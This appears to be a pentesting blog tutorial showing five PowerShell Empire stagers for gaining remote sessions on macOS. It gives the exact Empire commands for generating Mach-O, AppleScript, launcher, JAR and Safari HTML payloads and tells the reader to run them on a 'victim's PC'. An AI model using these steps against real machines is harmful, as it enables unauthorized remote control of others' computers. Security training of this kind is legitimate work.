Multiple Ways to Exploiting OSX using PowerShell Empire
In this article, we will learn multiple ways to how to hack OS X using empire. There are various stagers given in empire for the same and we use a few of them in our article. Method to attack OS X is similar to that of windows. For the beginner’s guide to pen-test OS X click here.
Table of Content :
The first stager we will use to attack is osx/macho. This stager will create a Mach-O file, which is an executable format of binaries in OS X. This file format is made for OS X specifically. This file format informs the system about the order in which code and data are read into memory. So, this stager is quite useful when it comes to attacking OS X.
The listener creation is the same as windows, use the http listener. Once the listener is created, execute the following set of commands:
usestager osx/macho set Listener http set OutFile shell.macho execute
As the shell.macho is executed in the victim’s PC, you will have your session as shown in the image below :
The next stager we will use is osx/applescript. This stager will create a code in an apple script, this script has an automated control over scriptable Mac applications as its dedicated script for Mac. Therefore, it’s an important stager for pen-testing Mac. To create the malicious said apple script run the following set of commands :
usestager osx/applescript set Listener http execute
Executing the above stager will create a code, run this code in the targeted system as it is shown in the following image :
As soon as the code is executed in the victim’s PC, you will have your session as shown in the image :
The next stager we will use is osx/launcher. This stager is most commonly used. To execute this stager, run the following commands :
usestager osx/launcher execute
copy this code and run it in the target system’s shell. Now as soon as the code is executed, you will have your session as shown in the image below :
The nest stager which we will use is osx/jar. This stager creates a jar file which is a Java archive file. This file format is used for compressed java files which when extracted as run as desired. This file extension is specifically made for Java files. This stager turns out to be a suitable one when it comes to attacking OS X. Use the following set of commands to execute the said stager :
usestager osx/jar set Listener http set OutFile out.jar execute
The stager will create a jar file as told above, as the said file will be executed in the victim’s system, you will have your session as shown in the image :
The last stager we will use is osx/safari_launcher, this will generate an HTML script for safari. For this stager, run the following set of commands:
usestager osx/safari_launcher set Listener http execute
Run the generated code in the safari of victim’s PC and so you shall have your session as shown in the image below :
So, these were five ways to attack or pentest OS X. They are pretty easy and convenient. Each of them is valid and up to date.
Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher Contact Here